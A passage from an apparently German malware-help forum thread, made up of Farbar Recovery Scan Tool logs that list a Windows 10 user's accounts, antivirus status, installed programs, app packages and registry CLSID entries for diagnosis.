2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ShellComponents
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\DiagTrack
2020-11-10 09:42 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Common Files\System
2020-11-10 09:36 - 2019-12-07 15:53 - 000000000 ____D C:\WINDOWS\OCR
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\winrm
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\WCN
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\slmgr
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\SysWOW64\Printing_Admin_Scripts
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\winrm
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\WCN
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\slmgr
2020-11-10 09:35 - 2019-12-07 15:51 - 000000000 ____D C:\WINDOWS\system32\Printing_Admin_Scripts
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\SysWOW64\DiagSvcs
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ___SD C:\WINDOWS\system32\dsc
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\et-EE
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\es-MX
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2020-11-10 09:35 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2020-11-10 09:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SysWOW64\MUI
2020-11-10 09:33 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\MUI
2020-11-06 22:05 - 2020-07-12 16:42 - 000000877 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000865 _____ C:\Users\Public\Desktop\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000865 _____ C:\ProgramData\Desktop\Notepad++.lnk
2020-11-06 22:05 - 2020-07-12 16:42 - 000000000 ____D C:\Users\Tom_Admin\AppData\Roaming\Notepad++
2020-11-06 14:19 - 2018-02-25 10:17 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-11-05 22:37 - 2017-12-02 13:42 - 000000000 ____D C:\Users\Tom\AppData\Local\PlaceholderTileLogoFolder

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2020-02-27 21:21 - 2020-02-27 21:42 - 150155571 _____ () C:\Program Files\video_editor_642.zip
2020-02-27 21:23 - 2020-02-20 13:43 - 070052768 _____ (Flash-Integro LLC                                          ) C:\Program Files\video_editor_x32.exe
2020-02-27 21:23 - 2020-02-20 13:43 - 080208568 _____ (Flash-Integro LLC                                          ) C:\Program Files\video_editor_x64.exe
2020-11-28 19:48 - 2020-12-02 22:38 - 000061440 _____ () C:\Users\Tom\AppData\Roaming\cookies.sqlite
2018-02-25 11:07 - 2020-07-30 10:09 - 000006656 _____ () C:\Users\Tom\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2019-07-19 18:42 - 2020-02-10 16:43 - 000012780 _____ () C:\Users\Tom\AppData\Local\krita.log
2020-02-10 16:43 - 2020-02-10 16:43 - 000000039 _____ () C:\Users\Tom\AppData\Local\kritadisplayrc
2019-07-19 18:42 - 2019-07-19 18:44 - 000014167 _____ () C:\Users\Tom\AppData\Local\kritarc
2020-01-25 13:06 - 2020-01-25 13:06 - 000000859 _____ () C:\Users\Tom\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
--- --- ---

Rupsi 03.12.2020 22:07
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-12-2020
durchgeführt von Tom (03-12-2020 22:05:01)
Gestartet von C:\Users\Tom\Desktop
Windows 10 Pro Version 2004 19041.630 (X64) (2020-11-10 10:00:01)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3451750051-380284315-2914928687-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3451750051-380284315-2914928687-503 - Limited - Disabled)
Gast (S-1-5-21-3451750051-380284315-2914928687-501 - Limited - Disabled)
Tom (S-1-5-21-3451750051-380284315-2914928687-1002 - Administrator - Enabled) => C:\Users\Tom
Tom_Admin (S-1-5-21-3451750051-380284315-2914928687-1001 - Administrator - Enabled) => C:\Users\Tom_Admin
Vincent (S-1-5-21-3451750051-380284315-2914928687-1003 - Limited - Enabled) => C:\Users\Vincent
WDAGUtilityAccount (S-1-5-21-3451750051-380284315-2914928687-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

4K YouTube to MP3 3.7 (HKLM-x32\...\{C4B2ABD0-F2D6-47C6-B1BE-320A060A5485}) (Version: 3.7.0.2852 - Open Media LLC)
7-Zip 18.05 (x64) (HKLM\...\7-Zip) (Version: 18.05 - Igor Pavlov)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20066 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 32.0.0.125 - Adobe)
Advanced Renamer (HKLM-x32\...\Advanced Renamer_is1) (Version: 3.85 - Hulubulu Software)
ANT Drivers Installer x64 (HKLM\...\{16BA964D-698D-4663-8FA7-B9613DA7958B}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
Ant Renamer (HKLM-x32\...\Ant Renamer 2_is1) (Version: 2.12.0 - Ant Software)
Anthem™ (HKLM-x32\...\{57b4eaa0-f1f5-407e-afbd-2db397381ad8}) (Version: 1.0.64.24016 - Electronic Arts)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Biet-O-Matic v2.14.14 (HKLM-x32\...\Biet-O-Matic v2.14.14) (Version: 2.14.14 - BOM Development Team)
BQ Firmware Flash Tool version 3.0.4 (HKLM-x32\...\{58946287-F553-4D93-AC53-8296836A500A}_is1) (Version: 3.0.4 - Mundo Reader S.L.)
calibre 64bit (HKLM\...\{3BB5C110-3153-47C8-B845-AA5F57C3C0A7}) (Version: 4.14.0 - Kovid Goyal)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.8.7128 - CDBurnerXP)
Command & Conquer™ The Ultimate Collection Additional Content (HKLM-x32\...\{1A882F29-BC18-4AC2-A71E-0FC30FA32568}) (Version: 1.0.0.0 - Electronic Arts)
Command & Conquer™: Generals and Zero Hour (HKLM-x32\...\{609F6FD5-4B22-4D7A-AD30-8C9DD480D5BE}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Das Telefonbuch Gelbe Seiten Map & Route (HKLM-x32\...\DasTelefonbuch Gelbe Seiten Map & Route) (Version:  - TVG Telefonbuch- und Verzeichnisverlag GmbH & Co. KG)
DaVinci Resolve (HKLM\...\{5913037B-95C8-4A27-8F37-026BBC7B5AF1}) (Version: 16.1.2026 - Blackmagic Design)
Destiny 2 (HKLM-x32\...\Destiny 2) (Version:  - Blizzard Entertainment)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 416.34 - NVIDIA Corporation) Hidden
Drakonia Black (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version:  - )
DVBViewer Pro (HKLM-x32\...\DVBViewer Pro_is1) (Version: 6.0.4 - CM&V)
Elevated Installer (HKLM-x32\...\{877496C2-70B0-42F1-835A-FAFE2CF0199C}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Epic Games Launcher (HKLM-x32\...\{AF7881ED-41D7-4ECA-8C7C-AE10DFA0E489}) (Version: 1.1.151.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Gameforge Client (HKLM-x32\...\{d3b2a0c1-f0d0-4888-ae0b-1c5e1febdafb}_is1) (Version: 2.1.12.165 - Gameforge)
Garmin Express (HKLM-x32\...\{235f2ee5-7383-44df-a298-01221caa5532}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{E944FA32-8BCF-474F-BFB2-D1EF24555873}) (Version: 7.1.4.0 - Garmin Ltd or its subsidiaries) Hidden
Google Earth Pro (HKLM-x32\...\{59F21DFB-6977-434B-9CB9-67783D6E7B6B}) (Version: 7.3.3.7786 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
GPL Ghostscript (HKLM\...\GPL Ghostscript 9.22) (Version: 9.22 - Artifex Software Inc.)
Hauppauge WinTV 8 (HKLM-x32\...\Hauppauge WinTV 8) (Version: v8.0.35159 (CD 5.6) - Hauppauge Computer Works)
IrfanView 4.50 (64-bit) (HKLM\...\IrfanView64) (Version: 4.50 - Irfan Skiljan)
K-Lite Mega Codec Pack 14.9.4 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 14.9.4 - KLCP)
Krita (x64) 4.2.3 (HKLM\...\Krita_x64) (Version: 4.2.3.0 - Krita Foundation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Malwarebytes version 4.2.3.96 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.2.3.96 - Malwarebytes)
Mein CEWE FOTOBUCH (HKLM-x32\...\Mein CEWE FOTOBUCH) (Version: 6.3.6 - CEWE Stiftung u Co. KGaA)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.52 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )
Microsoft Office FrontPage 2003 (HKLM-x32\...\{90170409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2019 - de-de (HKLM\...\ProPlus2019Retail - de-de) (Version: 16.0.13328.20356 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\OneDriveSetup.exe) (Version: 19.103.0527.0003 - Microsoft Corporation)
Microsoft SQL Server*2014 Express LocalDB  (HKLM\...\{CA191120-4CB1-4E3D-89B8-79FDB9017A2E}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Teams) (Version: 1.3.00.24755 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{143E35D3-F0A4-4E90-96C9-B1B72F11343A}) (Version: 2.70.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.23.27820 (HKLM-x32\...\{45231ab4-69fd-486a-859d-7a59fcd11013}) (Version: 14.23.27820.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version:  - Pavel Cvrcek)
Mozilla Firefox 83.0 (x64 de) (HKLM\...\Mozilla Firefox 83.0 (x64 de)) (Version: 83.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 78.5.1 - Mozilla)
Mozilla Thunderbird 78.5.1 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 78.5.1 (x86 de)) (Version: 78.5.1 - Mozilla)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.11 - F.J. Wechselberger)
News File Grabber 4.6.0.4 (HKLM-x32\...\News File Grabber_is1) (Version:  - RSBR-Software)
NosTale de-DE (HKLM-x32\...\{dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9.de-DE}) (Version:  - Gameforge)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.9 - Notepad++ Team)
NVIDIA 3D Vision Controller-Treiber 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA Grafiktreiber 432.00 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 432.00 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.16 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.16 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.18.0907 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.18.0907 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 24.0.3 - OBS Project)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0407-1000-0000000FF1CE}) (Version: 16.0.11727.20244 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13328.20340 - Microsoft Corporation) Hidden
OpenAudible 2.3.5 (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\7008-5171-7013-3819) (Version: 2.3.5 - openaudible.org)
Origin (HKLM-x32\...\Origin) (Version: 10.5.89.45622 - Electronic Arts, Inc.)
PDF24 Creator 9.2.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: 9.2.0 - PDF24.org)
Phase 5 HTML-Editor (HKLM-x32\...\{20B1B020-DEAE-48D1-9960-D4C3185D758B}) (Version: 5.6.2.3 - Systemberatung Schommer)
Plex Media Server (HKLM-x32\...\{1b8e71fc-44b8-4550-9376-72db5f2746ce}) (Version: 1.11.3.4803 - Plex, Inc.)
Plex Media Server (HKLM-x32\...\{617D6B5B-FCAE-43F5-9B09-73798070833E}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Pokémon Trading Card Game Online (HKLM-x32\...\{C239A609-2496-402F-A119-4BF92B43D717}) (Version: 2.49.0 - The Pokémon Company International)
ProgTV 2 (x64) x64 (HKLM\...\ProgTV) (Version: 2.x - Prog)
QuickPar 0.9 (HKLM-x32\...\QuickPar) (Version: 0.9 - Peter B. Clements)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7910 - Realtek Semiconductor Corp.)
RecordPad Audio-Recorder (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Recordpad) (Version: 7.05 - NCH Software)
RV-Print 2.0 (HKLM-x32\...\{38DC365A-06D8-494C-8F29-04B3A6652ACE}) (Version: 2.00.684.0 - Resch-Verlag)
SABnzbd 2.3.7 (HKLM-x32\...\SABnzbd) (Version: 2.3.7 - The SABnzbd Team)
Scratch 2 Offline Editor (HKLM-x32\...\{6E988774-5309-E02E-7EA8-F19CB65C2063}) (Version: 255 - Massachusetts Institute of Technology) Hidden
Scratch 2 Offline Editor (HKLM-x32\...\edu.media.mit.Scratch2Editor) (Version: 461 - Massachusetts Institute of Technology)
Settlers 7 (HKLM-x32\...\Uplay Install 8) (Version:  - Ubisoft)
Shotcut (HKLM-x32\...\Shotcut) (Version: 20.02.17 - Meltytech, LLC)
SpeedCommander 16 (x64) (HKLM\...\SpeedCommander 16 (x64)) (Version: 16.20.8300 - SWE Sven Ritter)
SpeedCommander 17 (x64) (HKLM\...\SpeedCommander 17 (x64)) (Version: 17.30.8900 - SWE Sven Ritter)
StarMoney (HKLM-x32\...\{54552154-C54F-4F81-99FE-84567C2BCB56}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{5C1209B1-FA1D-40D3-BA13-4ED9F0F31002}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{99D7711E-74BE-4920-8088-CB785D4C406F}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B535DF59-3B5C-40B6-934B-BAF2987CA9A0}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{B98B1721-994D-4B47-B097-ADD88E57A298}) (Version: 4.0.8.25 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{BA8CA518-A9B4-485C-AEE0-22E3F0E0E5F6}) (Version: 5.0.0.226 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{E771D898-9A06-4EEF-B84D-B2DB75080F3E}) (Version: 6.0.1.83 - StarFinanz) Hidden
StarMoney (HKLM-x32\...\{F8726CFE-2A08-4B2A-9E10-645F38D5A04A}) (Version: 7.0.0.203 - StarFinanz) Hidden
StarMoney 11  (HKLM-x32\...\{99DED8BC-9674-43AA-AE56-8E52C15769B1}) (Version: 11 - Star Finanz GmbH)
StarMoney 12 Basic  (HKLM-x32\...\{80A5295E-DD70-4A94-86A3-8F63AE01F0E5}) (Version: 12 - Star Finanz GmbH)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
StExBar (HKLM-x32\...\{A5927ACA-AE5E-44E6-97BA-3E512CFF3963}) (Version: 1.10.0 - Stefans Tools)
Stopping Plex (HKLM-x32\...\{E70B9551-B5D4-41BC-AB7C-EE44025F77DC}) (Version: 1.11.3803 - Plex, Inc.) Hidden
Synology Assistant (remove only) (HKLM-x32\...\Synology Assistant) (Version: 6.1-15163 - Synology)
Synology Photo Station Uploader (remove only) (HKLM-x32\...\Photo Station Uploader) (Version: 1.4.3.087 - Synology)
T16 Wired Gaming Mouse (HKLM-x32\...\{444BE55C-4B14-4DB8-9922-6846C1437677}_is1) (Version: 1.0.3 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.2.1 - TeamSpeak Systems GmbH)
TempoPerfect Metronome Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\TempoPerfect) (Version: 4.08 - NCH Software)
Titanfall™ 2 (HKLM-x32\...\{4BD80373-FEE7-45B6-8249-6E8E98717405}) (Version: 1.0.1.3 - Electronic Arts, Inc.)
Tone Generator Tongenerator-Software (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\ToneGen) (Version: 3.05 - NCH Software)
twengoo (HKLM-x32\...\{2ADA8DBD-2833-4235-A07E-0CD653A992FF}) (Version: 1.0.0.0 - Twengoo)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{16AD6161-2E47-4BF1-AA77-0946EFE93E08}) (Version: 2.61.0.0 - Microsoft Corporation)
Uplay (HKLM-x32\...\Uplay) (Version: 73.0 - Ubisoft)
VdhCoApp 1.2.4 (HKLM\...\weh-iss-net.downloadhelper.coapp_is1) (Version:  - DownloadHelper)
VLC media player (HKLM\...\VLC media player) (Version: 3.0.11 - VideoLAN)
VSDC Free Video Editor Version 6.4.2.102 (HKLM\...\VSDC Free Video Editor_is1) (Version: 6.4.2.102 - Flash-Integro LLC)
Wahlhelfer2018 (HKLM-x32\...\{AFC040C0-4AB0-11DE-5F90-00A66CB96952}) (Version: Version 1.34 - W.A.F. Institut AG)
WavePad Audio-Editor (HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\WavePad) (Version: 8.08 - NCH Software)
WestwoodChat (HKLM-x32\...\{7CAE6A67-AF7B-4A6A-8705-8AFACA45BB60}) (Version: 1.0.0.0 - WestwoodChat)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version: 1.0.0.0 - WestwoodOnline)
Windows 10-Update-Assistent (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22452 - Microsoft Corporation)
Windows 7 Games for Windows 10 and 8 (HKLM\...\Win7Games) (Version: 2.0 - hxxp://winaero.com)
Windows-Treiberpaket - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows-Treiberpaket - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
Wondershare Filmora9(Build 9.3.6) (HKLM\...\Wondershare Filmora9_is1) (Version:  - Wondershare Software)
Wondershare Helper Compact 2.6.0 (HKLM-x32\...\{5363CE84-5F09-48A1-8B6C-6BB590FFEDF2}_is1) (Version: 2.6.0 - Wondershare)
World in Conflict (HKLM-x32\...\Uplay Install 90) (Version:  - Ubisoft)

Packages:
=========
Audible - Hörbuch und Hörspiel App -> C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2 [2020-11-25] (Audible Inc)
Fotos-Add-On -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2017.39121.36610.0_x64__8wekyb3d8bbwe [2020-11-01] (Microsoft Corporation)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_121.1.193.0_x64__v10z8vjag6ke6 [2020-11-05] (HP Inc.)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-01] (Microsoft Corporation)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-12] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-12] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_4.0.11030.0_x64__8wekyb3d8bbwe [2020-11-15] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.10142.0_x64__8wekyb3d8bbwe [2020-10-21] (Microsoft Studios) [MS Ad]

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3451750051-380284315-2914928687-1002_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Tom\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20240.5\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3451750051-380284315-2914928687-1002_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Tom\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20240.5\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation)
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => D:\Program Files\7-Zip\7-zip.dll [2018-04-30] (Igor Pavlov) [Datei ist nicht signiert]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2020-09-24] (Notepad++ -> )
